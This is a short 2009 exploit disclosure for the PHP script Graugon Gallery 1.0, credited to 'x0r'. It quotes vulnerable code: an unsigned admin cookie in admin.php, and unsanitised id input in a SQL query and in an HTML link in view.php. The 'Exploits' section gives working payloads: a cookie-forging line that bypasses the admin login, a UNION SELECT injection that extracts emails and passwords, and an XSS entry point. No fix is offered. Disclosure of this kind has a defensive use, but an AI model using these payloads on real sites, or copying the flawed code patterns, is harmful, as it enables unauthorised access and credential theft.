Graugon Gallery 1.0 (XSS-SQL-Cookie Bypass) Remote Vulnerabilities

2009-02-11 23:13:55

#########################################################################################
[0x01] Informations:

Name : Graugon Gallery 1.0
Download : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability : Sql Injection/ Insecure Cookie Handling/XSS
Author : x0r
Contact : [email protected]
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]

Bugged file is /[path]/view.php

[Code]

$id = $_GET['id'];
...

$query = "SELECT * FROM g_gallery WHERE id=$id";
$result = mysql_query($query);
[/code]

[Code]

$id = $_GET['id'];

echo "....<a href='view.php?id=" . $id . "'> "

[/code]


#########################################################################################
[0x03] Exploits:

Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
2- http://victim.it/view.php?id=-1337 union select
0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
( change number of columns)
3- ?id=[XSSCODE]

########################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.